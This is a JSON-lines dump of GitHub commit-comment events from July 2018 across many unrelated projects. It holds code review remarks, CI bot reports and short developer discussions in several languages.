{"id":"8037900712","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/Products.statusmessages"},"payload":{"comment":{"id":29887379,"position":null,"line":null,"path":null,"commit_id":"649cb3916a2d719e45959eabed584c9a5c8d485a","created_at":"2018-07-30T14:00:48Z","updated_at":"2018-07-30T14:00:48Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-Products.statusmessages/27/violations\n```\nProducts/statusmessages/tests/test_adapter.py:35:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:221:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_adapter.py:241:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:308:0: P102 docstring does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-30T14:00:48Z"}
{"id":"8037907354","type":"CommitCommentEvent","actor":{"login":"chivee"},"repo":{"name":"lanpa/tensorboardX"},"payload":{"comment":{"id":29887393,"position":168,"line":161,"path":"docs/tutorial.rst","commit_id":"c533e8c231b7cddc3726c14d02c947b6cc0d4f34","created_at":"2018-07-30T14:01:50Z","updated_at":"2018-07-30T14:01:50Z","author_association":"NONE","body":"Little confused here, why using tensorboard-pytorch over tensorboardx"}},"created_at":"2018-07-30T14:01:50Z"}
{"id":"8037911210","type":"CommitCommentEvent","actor":{"login":"ZE3kr"},"repo":{"name":"onehumanbeing/leetcode"},"payload":{"comment":{"id":29887404,"position":17,"line":17,"path":"algorithm/0003/res.cpp","commit_id":"596f43d2428fe3a7cb4c5b03cc68124fb41865ec","created_at":"2018-07-30T14:02:28Z","updated_at":"2018-07-30T14:02:28Z","author_association":"NONE","body":"可以用另一种思路来解决，此处不需要再次循环，然而我文字表述不好，看代码吧 https://github.com/ZE3kr/LeetCode-Problems/blob/master/0001%7E0100/0003/main.cpp\r\n\r\nPS：我的天 C++ 怎么这么复杂？一个 map 的操作就比别的语言复杂了好多（萌新刚接触 C）"}},"created_at":"2018-07-30T14:02:28Z"}
{"id":"8037913211","type":"CommitCommentEvent","actor":{"login":"frasertweedale"},"repo":{"name":"frasertweedale/hs-jose"},"payload":{"comment":{"id":29887410,"position":32,"line":255,"path":"src/Crypto/JOSE/JWK.hs","commit_id":"59ca5e656370e5b7812faadf5234aa9b0724e782","created_at":"2018-07-30T14:02:48Z","updated_at":"2018-07-30T14:02:48Z","author_association":"OWNER","body":"It will be a false positive, yes.  `checkJWK` doesn't know about the algorithm so taking this approach we can't really do any better."}},"created_at":"2018-07-30T14:02:48Z"}
{"id":"8037914246","type":"CommitCommentEvent","actor":{"login":"andrekenjii"},"repo":{"name":"Samuel-Oliveira/Java_CTe"},"payload":{"comment":{"id":29887412,"position":null,"line":null,"path":null,"commit_id":"b6ede201d5198c0644147e5bda896d48d1e7eb2d","created_at":"2018-07-30T14:02:58Z","updated_at":"2018-07-30T14:02:58Z","author_association":"NONE","body":"Estou me quebrando nesta questão. Coloquei o namespace na raiz \"enviCTe\", bem como nos filhos \"CTe\". No entanto, quando faço o request (service reference do C#), parece que o maldito \"unifica\" os namespaces na raiz e apaga dos filhos. Tá osso"}},"created_at":"2018-07-30T14:02:58Z"}
{"id":"8037915184","type":"CommitCommentEvent","actor":{"login":"WestLangley"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":29887413,"position":null,"line":null,"path":null,"commit_id":"268ba4d2ae97fd9a6c0e583ce336e3eed090e02a","created_at":"2018-07-30T14:03:08Z","updated_at":"2018-07-30T14:03:08Z","author_association":"COLLABORATOR","body":"Fixes #10360."}},"created_at":"2018-07-30T14:03:08Z"}
{"id":"8037916503","type":"CommitCommentEvent","actor":{"login":"AlexanderKupriyanov"},"repo":{"name":"mikanmatsuri/mikantaberu"},"payload":{"comment":{"id":29887415,"position":5,"line":8,"path":"index.html","commit_id":"40410e37bb25d6b05d425e660a58019b3ad579ee","created_at":"2018-07-30T14:03:20Z","updated_at":"2018-07-30T14:03:20Z","author_association":"NONE","body":"ここ誤字ね\r\nbrackはない"}},"created_at":"2018-07-30T14:03:20Z"}
{"id":"8037917849","type":"CommitCommentEvent","actor":{"login":"frasertweedale"},"repo":{"name":"frasertweedale/hs-jose"},"payload":{"comment":{"id":29887420,"position":null,"line":null,"path":null,"commit_id":"59ca5e656370e5b7812faadf5234aa9b0724e782","created_at":"2018-07-30T14:03:33Z","updated_at":"2018-07-30T14:03:33Z","author_association":"OWNER","body":"Was mainly waiting of feedback to decide if it's a good idea and meets the requirements adequately.  Maybe it doesn't, per your inline comment?"}},"created_at":"2018-07-30T14:03:33Z"}
{"id":"8037924169","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887431,"position":49,"line":45,"path":"CaseStudies/glass/src/Python/NewImplementation/Input.py","commit_id":"e7b345924dc795c534547d4d9d29130563065ae5","created_at":"2018-07-30T14:04:34Z","updated_at":"2018-07-30T14:04:34Z","author_association":"COLLABORATOR","body":"@smiths is `init()` even necessary?"}},"created_at":"2018-07-30T14:04:34Z"}
{"id":"8037928305","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"iZeaoGamer/Vanish"},"payload":{"comment":{"id":29887442,"position":null,"line":null,"path":null,"commit_id":"df80795bb9f66e8527436dca091776736080fbe7","created_at":"2018-07-30T14:05:14Z","updated_at":"2018-07-30T14:05:14Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/iZeaoGamer/Vanish/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `93990a9e-9401-11e8-97e8-09d250ed9280`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-30T14:05:14Z"}
{"id":"8037933370","type":"CommitCommentEvent","actor":{"login":"AlexanderKupriyanov"},"repo":{"name":"mikanmatsuri/mikantaberu"},"payload":{"comment":{"id":29887448,"position":29,"line":50,"path":"index.html","commit_id":"40410e37bb25d6b05d425e660a58019b3ad579ee","created_at":"2018-07-30T14:06:03Z","updated_at":"2018-07-30T14:06:03Z","author_association":"NONE","body":"そう、そんな感じで白黒白黒の一行を作って、改行してからまた一行....\r\n改行のやり方はissue 2 で見てね。\r\n回り込み解除がそれ。"}},"created_at":"2018-07-30T14:06:03Z"}
{"id":"8037935097","type":"CommitCommentEvent","actor":{"login":"0x0ade"},"repo":{"name":"FNA-XNA/FNA"},"payload":{"comment":{"id":29887449,"position":null,"line":null,"path":null,"commit_id":"b07f85313f4607fc197ee99461501afb37ccb01b","created_at":"2018-07-30T14:06:19Z","updated_at":"2018-07-30T14:06:19Z","author_association":"CONTRIBUTOR","body":"I can't seem to replicate libEGL's \"called unimplemented OpenGL ES API\" message in this case anymore as `SDL_GL_GetProcAddress` now gives me NULL for both `glDrawRangeElementsBaseVertex` and `glDrawRangeElementsBaseVertexOES`. It seems like a system update fixed it, or it just wasn't an issue in this case in the first place.\r\n\r\nIt still applies to `glDebugMessageControlKHR`, though, as I can still consistently trigger \r\n```\r\n$ adb logcat | grep \"called unimplemented OpenGL ES API\"\r\nE/libEGL  (12404): called unimplemented OpenGL ES API\r\n```\r\nwhen not checking for the `KHR_debug` extension."}},"created_at":"2018-07-30T14:06:19Z"}
{"id":"8037939864","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29887462,"position":20,"line":10723,"path":"src/game/Entities/Unit.cpp","commit_id":"f61fb6689de37165505cb3ee178ec090b016f8c4","created_at":"2018-07-30T14:07:07Z","updated_at":"2018-07-30T14:07:07Z","author_association":"CONTRIBUTOR","body":"I don't see the link between the remaining of the commit and the removal of this part of code that happens when a unit is released from charm. I understand that the release from charm can affect combat start position, but it should not affect combat status or threat."}},"created_at":"2018-07-30T14:07:07Z"}
{"id":"8037942876","type":"CommitCommentEvent","actor":{"login":"Mygod"},"repo":{"name":"shadowsocks/shadowsocks-libev"},"payload":{"comment":{"id":29887470,"position":9,"line":683,"path":"src/local.c","commit_id":"a906d0cfc81750c55a9ef432e8af4fe0228f6948","created_at":"2018-07-30T14:07:34Z","updated_at":"2018-07-30T14:07:34Z","author_association":"NONE","body":"Actually this also causes the problem of `ip` not initialized. This code is terrible. :sweat: "}},"created_at":"2018-07-30T14:07:34Z"}
{"id":"8037943012","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887471,"position":5,"line":5,"path":".editorconfig","commit_id":"e1b51b1b837d6f673bb51c6ac587397e71948b3a","created_at":"2018-07-30T14:07:36Z","updated_at":"2018-07-30T14:07:36Z","author_association":"MEMBER","body":"Mmm.. most of these things should be covered by clang-format."}},"created_at":"2018-07-30T14:07:36Z"}
{"id":"8037944128","type":"CommitCommentEvent","actor":{"login":"simark"},"repo":{"name":"Microsoft/language-server-protocol"},"payload":{"comment":{"id":29887475,"position":4,"line":5,"path":"contributing.md","commit_id":"8c10a34b88e9ada30f54b03dcfc13717b4c6f3b0","created_at":"2018-07-30T14:07:47Z","updated_at":"2018-07-30T14:07:47Z","author_association":"CONTRIBUTOR","body":"\"propos\" -> \"propose\""}},"created_at":"2018-07-30T14:07:47Z"}
{"id":"8037944171","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"openmrs/openmrs-react-components"},"payload":{"comment":{"id":29887476,"position":5,"line":19,"path":"src/features/login/sagas.js","commit_id":"731a6d2142e1f2ed9672dc3e1088960bd00c1345","created_at":"2018-07-30T14:07:47Z","updated_at":"2018-07-30T14:07:47Z","author_association":"MEMBER","body":"@jomadoye sorry, I noticed this error after the fast... we changed the name of the setCurrentSessionLocation api function, but didn't update it here."}},"created_at":"2018-07-30T14:07:47Z"}
{"id":"8037946855","type":"CommitCommentEvent","actor":{"login":"woook"},"repo":{"name":"woook/moka-fe"},"payload":{"comment":{"id":29887481,"position":null,"line":null,"path":null,"commit_id":"f15c513c52bd53ed1f8ca702a0a1f5220c3a252c","created_at":"2018-07-30T14:08:14Z","updated_at":"2018-07-30T14:08:14Z","author_association":"OWNER","body":"Fixes #524 \r\n - added a WHERE to data source query"}},"created_at":"2018-07-30T14:08:14Z"}
{"id":"8037947498","type":"CommitCommentEvent","actor":{"login":"lanpa"},"repo":{"name":"lanpa/tensorboardX"},"payload":{"comment":{"id":29887486,"position":168,"line":161,"path":"docs/tutorial.rst","commit_id":"c533e8c231b7cddc3726c14d02c947b6cc0d4f34","created_at":"2018-07-30T14:08:20Z","updated_at":"2018-07-30T14:08:20Z","author_association":"OWNER","body":"It was called tensorboard-pytorch before. Will change that later."}},"created_at":"2018-07-30T14:08:20Z"}
{"id":"8037948790","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887491,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-30T14:08:32Z","updated_at":"2018-07-30T14:08:32Z","author_association":"OWNER","body":"Good news!"}},"created_at":"2018-07-30T14:08:32Z"}
{"id":"8037949071","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"openmrs/openmrs-react-components"},"payload":{"comment":{"id":29887493,"position":4,"line":18,"path":"src/rest/locationRest.js","commit_id":"731a6d2142e1f2ed9672dc3e1088960bd00c1345","created_at":"2018-07-30T14:08:35Z","updated_at":"2018-07-30T14:08:35Z","author_association":"MEMBER","body":"I just noticed this... this function already exists in sessionRest.js (which is where we want it to be) so we don't need it here."}},"created_at":"2018-07-30T14:08:35Z"}
{"id":"8037951459","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29887499,"position":null,"line":null,"path":null,"commit_id":"ce033af8f4259cfbe8521101fae6293bb218c3c8","created_at":"2018-07-30T14:08:59Z","updated_at":"2018-07-30T14:08:59Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T14:08:59Z"}
{"id":"8037954142","type":"CommitCommentEvent","actor":{"login":"flibitijibibo"},"repo":{"name":"FNA-XNA/FNA"},"payload":{"comment":{"id":29887508,"position":null,"line":null,"path":null,"commit_id":"b07f85313f4607fc197ee99461501afb37ccb01b","created_at":"2018-07-30T14:09:25Z","updated_at":"2018-07-30T14:09:25Z","author_association":"MEMBER","body":"Neat, updated the baseVertex one accordingly:\r\n\r\nhttps://github.com/FNA-XNA/FNA/commit/ac371efba5f6d401911efd5d6f37892cf703c893\r\n\r\nSucks that the debug callbacks are still wrong but oh well..."}},"created_at":"2018-07-30T14:09:25Z"}
{"id":"8037956514","type":"CommitCommentEvent","actor":{"login":"jcalfee"},"repo":{"name":"EOSIO/eosjs"},"payload":{"comment":{"id":29887522,"position":null,"line":null,"path":null,"commit_id":"3ef13f3743be9b358c02f47263995eae16201279","created_at":"2018-07-30T14:09:48Z","updated_at":"2018-07-30T14:09:48Z","author_association":"CONTRIBUTOR","body":"Interesting .. I noticed that null and undefined cause test to return true. \r\nI changed to \r\n```js\r\n- const [, contractRaw] = str.split('@')\r\n+ const [, contractRaw = ''] = str.split('@')\r\n```"}},"created_at":"2018-07-30T14:09:48Z"}
{"id":"8037957677","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"iZeaoGamer/Vanish"},"payload":{"comment":{"id":29887525,"position":null,"line":null,"path":null,"commit_id":"f9e6209d61e258f80100477f6da7cbc9051f8725","created_at":"2018-07-30T14:09:59Z","updated_at":"2018-07-30T14:09:59Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/iZeaoGamer/Vanish/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `3d6e5ec0-9402-11e8-8add-a83d420d4be1`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-30T14:09:59Z"}
{"id":"8037962557","type":"CommitCommentEvent","actor":{"login":"deniscostadsc"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887529,"position":5,"line":5,"path":".editorconfig","commit_id":"e1b51b1b837d6f673bb51c6ac587397e71948b3a","created_at":"2018-07-30T14:10:44Z","updated_at":"2018-07-30T14:10:44Z","author_association":"CONTRIBUTOR","body":"Not on my editor."}},"created_at":"2018-07-30T14:10:44Z"}
{"id":"8037966252","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887542,"position":74,"line":61,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T14:11:19Z","updated_at":"2018-07-30T14:11:19Z","author_association":"NONE","body":"`uint` is never negative."}},"created_at":"2018-07-30T14:11:19Z"}
{"id":"8037970867","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887553,"position":49,"line":45,"path":"CaseStudies/glass/src/Python/NewImplementation/Input.py","commit_id":"e7b345924dc795c534547d4d9d29130563065ae5","created_at":"2018-07-30T14:12:04Z","updated_at":"2018-07-30T14:12:04Z","author_association":"OWNER","body":"No, init isn't necessary.  If it was necessary, we would have to include it in the MIS specification.  We make the assumption that none of the state variables will be accessed until after load_params has been called.  load_params does the job of your init."}},"created_at":"2018-07-30T14:12:04Z"}
{"id":"8037972995","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29887559,"position":null,"line":null,"path":null,"commit_id":"9b4cbc4a4552316ccccd973633b05587064b3c0a","created_at":"2018-07-30T14:12:24Z","updated_at":"2018-07-30T14:12:24Z","author_association":"MEMBER","body":"Yeah, this fixes that bug where the sound track would fade out."}},"created_at":"2018-07-30T14:12:24Z"}
{"id":"8037973242","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887561,"position":5,"line":5,"path":".editorconfig","commit_id":"e1b51b1b837d6f673bb51c6ac587397e71948b3a","created_at":"2018-07-30T14:12:26Z","updated_at":"2018-07-30T14:12:26Z","author_association":"MEMBER","body":"which thing? I don't think this should be enforced the project, but by the personal configuration of each person. "}},"created_at":"2018-07-30T14:12:26Z"}
{"id":"8037974045","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"openmrs/openmrs-react-components"},"payload":{"comment":{"id":29887563,"position":5,"line":6,"path":"src/rest/__mocks__/sessionRest.js","commit_id":"f59544977252835877906e633eb1198dda653036","created_at":"2018-07-30T14:12:34Z","updated_at":"2018-07-30T14:12:34Z","author_association":"MEMBER","body":"@jomadoye and then my fix broke the tests, so I fixed that here... :)\r\n\r\nThis is a good point, though, we've been mocking the REST API using the jest manual mocks (https://jestjs.io/docs/en/manual-mocks).\r\n\r\nSo when we change the name of a function in a file like sessionRest.js, we should change the name in the corresponding __mocks__/sessionRest.js.   Then the test would have failed earlier.\r\n\r\nif there are better practice ways of mocking, feel free to let us know, thanks @jomadoye  @rhenshaw56  "}},"created_at":"2018-07-30T14:12:34Z"}
{"id":"8037975360","type":"CommitCommentEvent","actor":{"login":"Generalcamo"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29887567,"position":51,"line":71,"path":"src/main/java/mods/railcraft/common/plugins/jei/RailcraftJEIPlugin.java","commit_id":"c30f172437779b64f1af439daf69827c0217050d","created_at":"2018-07-30T14:12:47Z","updated_at":"2018-07-30T14:12:47Z","author_association":"MEMBER","body":"One is a special seasonal item. The other is unused. I was intending to do the same to the deprecated stuff but didn't get around to that."}},"created_at":"2018-07-30T14:12:47Z"}
{"id":"8037976502","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887570,"position":22,"line":18,"path":"CaseStudies/glass/src/Python/NewImplementation/Input.py","commit_id":"e7b345924dc795c534547d4d9d29130563065ae5","created_at":"2018-07-30T14:12:58Z","updated_at":"2018-07-30T14:12:58Z","author_association":"OWNER","body":"The type isn't right for t.  ThicknessT might not be implemented yet, but when it is, t should have that type."}},"created_at":"2018-07-30T14:12:58Z"}
{"id":"8037977624","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":29887573,"position":33,"line":234,"path":"scripts/pipeline/compara_db_config.rng","commit_id":"b6501b6b8674f5ba5df36949346c8d712685d203","created_at":"2018-07-30T14:13:09Z","updated_at":"2018-07-30T14:13:09Z","author_association":"MEMBER","body":"I understand the other `<optional>`, but not this one. `<oneOrMore>` + `<choice>` means that just 1 protein-tree should be valid"}},"created_at":"2018-07-30T14:13:09Z"}
{"id":"8037979436","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29887574,"position":null,"line":null,"path":null,"commit_id":"cafb51b55df5dd6acbaf3f468b97eca058df256e","created_at":"2018-07-30T14:13:25Z","updated_at":"2018-07-30T14:13:25Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-449](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-449).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-449-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T14:13:25Z"}
{"id":"8037979793","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"iZeaoGamer/Vanish"},"payload":{"comment":{"id":29887576,"position":null,"line":null,"path":null,"commit_id":"7545cc766d7ed30352aaff8b39d30a0a7a04cf13","created_at":"2018-07-30T14:13:28Z","updated_at":"2018-07-30T14:13:28Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/iZeaoGamer/Vanish/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `b96774e4-9402-11e8-870c-7e00da61de99`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-30T14:13:28Z"}
{"id":"8037980439","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887578,"position":17,"line":13,"path":"CaseStudies/glass/src/Python/NewImplementation/Input.py","commit_id":"e7b345924dc795c534547d4d9d29130563065ae5","created_at":"2018-07-30T14:13:34Z","updated_at":"2018-07-30T14:13:34Z","author_association":"OWNER","body":"g is not a string, it is GlassTypeT.  I haven't checked if this ADT is implemented yet, but when it is, this will have to be updated."}},"created_at":"2018-07-30T14:13:34Z"}
{"id":"8037981563","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/platypus-nf"},"payload":{"comment":{"id":29887580,"position":null,"line":null,"path":null,"commit_id":"94786f51af4147e4ee88b2899a29d5a69d43b4af","created_at":"2018-07-30T14:13:44Z","updated_at":"2018-07-30T14:13:44Z","author_association":"MEMBER","body":"fixes #18 "}},"created_at":"2018-07-30T14:13:44Z"}
{"id":"8037981765","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887581,"position":5,"line":5,"path":".editorconfig","commit_id":"e1b51b1b837d6f673bb51c6ac587397e71948b3a","created_at":"2018-07-30T14:13:47Z","updated_at":"2018-07-30T14:13:47Z","author_association":"MEMBER","body":"And if something else is needed, regarding to C format, it can be added to clang-format. It has a file for adding things. "}},"created_at":"2018-07-30T14:13:47Z"}
{"id":"8037993792","type":"CommitCommentEvent","actor":{"login":"girol"},"repo":{"name":"eluminatis/crud_generator"},"payload":{"comment":{"id":29887610,"position":71,"line":177,"path":"controller_functions.php","commit_id":"08af42935d9697e0479ac3c6d050caa55740b140","created_at":"2018-07-30T14:15:42Z","updated_at":"2018-07-30T14:15:42Z","author_association":"CONTRIBUTOR","body":":rage3: "}},"created_at":"2018-07-30T14:15:42Z"}
{"id":"8037996366","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887617,"position":130,"line":94,"path":"CaseStudies/glass/src/Python/NewImplementation/Input.py","commit_id":"e7b345924dc795c534547d4d9d29130563065ae5","created_at":"2018-07-30T14:16:08Z","updated_at":"2018-07-30T14:16:08Z","author_association":"OWNER","body":"Can you please change this to 60.0 and 16.0.  It doesn't matter for Python3, but if we should ever have to change this to Python2, this could lead to a very subtle error, if td or m happen to end up as integers.  (I know it is unlikely, but with division in Python, I always make the literals floats.)"}},"created_at":"2018-07-30T14:16:08Z"}
{"id":"8037999986","type":"CommitCommentEvent","actor":{"login":"TangDongxu"},"repo":{"name":"TangDongxu/Tmall"},"payload":{"comment":{"id":29887621,"position":null,"line":null,"path":null,"commit_id":"4d6773a2f31543c3d52c6d57530aa662e0846f00","created_at":"2018-07-30T14:16:42Z","updated_at":"2018-07-30T14:16:42Z","author_association":"OWNER","body":"实现了字体图标"}},"created_at":"2018-07-30T14:16:42Z"}
{"id":"8038000072","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887622,"position":73,"line":60,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T14:16:43Z","updated_at":"2018-07-30T14:16:43Z","author_association":"NONE","body":"Why not make it `payable` and let the player top-up their balance at the same time?"}},"created_at":"2018-07-30T14:16:43Z"}
{"id":"8038006083","type":"CommitCommentEvent","actor":{"login":"chris-steele"},"repo":{"name":"adaptlearning/adapt-contrib-slider"},"payload":{"comment":{"id":29887632,"position":4,"line":11,"path":"templates/slider.hbs","commit_id":"578ad47afc47315395a5632cba8abed9093ce5ed","created_at":"2018-07-30T14:17:40Z","updated_at":"2018-07-30T14:17:40Z","author_association":"CONTRIBUTOR","body":"Did you mean to take out the data-id attribute? Guessing not as it breaks the functionality!"}},"created_at":"2018-07-30T14:17:40Z"}
{"id":"8038006092","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887633,"position":102,"line":79,"path":"CaseStudies/glass/src/Python/NewImplementation/Input.py","commit_id":"e7b345924dc795c534547d4d9d29130563065ae5","created_at":"2018-07-30T14:17:40Z","updated_at":"2018-07-30T14:17:40Z","author_association":"OWNER","body":"I haven't checked the ADT implementation, but calling a constructor looks good."}},"created_at":"2018-07-30T14:17:40Z"}
{"id":"8038010798","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887650,"position":109,"line":93,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T14:18:21Z","updated_at":"2018-07-30T14:18:21Z","author_association":"NONE","body":"I think you missed a situation where a malevolent player may mess-up your storage. Can you see it? Respond here."}},"created_at":"2018-07-30T14:18:21Z"}
{"id":"8038010907","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29887651,"position":null,"line":null,"path":null,"commit_id":"5f0d36b84129605219083e9c24caf13a185be1b3","created_at":"2018-07-30T14:18:22Z","updated_at":"2018-07-30T14:18:22Z","author_association":"MEMBER","body":"This isn’t the way to do it. This is a ManageWiki managed setting therefore the database value overrides the LS setting here."}},"created_at":"2018-07-30T14:18:22Z"}
{"id":"8038014092","type":"CommitCommentEvent","actor":{"login":"danwood76"},"repo":{"name":"danwood76/android_device_samsung_a3xeltexx"},"payload":{"comment":{"id":29887657,"position":621,"line":53,"path":"hardware/power/Power.cpp","commit_id":"aea5b984660ef01c3b7d8bce9580476c511cf6c3","created_at":"2018-07-30T14:18:52Z","updated_at":"2018-07-30T14:18:52Z","author_association":"OWNER","body":"Adding \"config_supportDoubleTapWake\" \"true\" to the overlay should make the setting appear in display settings and then it can be user selectable. I will test it out later."}},"created_at":"2018-07-30T14:18:52Z"}
{"id":"8038018041","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887663,"position":109,"line":93,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T14:19:28Z","updated_at":"2018-07-30T14:19:28Z","author_association":"NONE","body":"I just found a second way to be malicious."}},"created_at":"2018-07-30T14:19:28Z"}
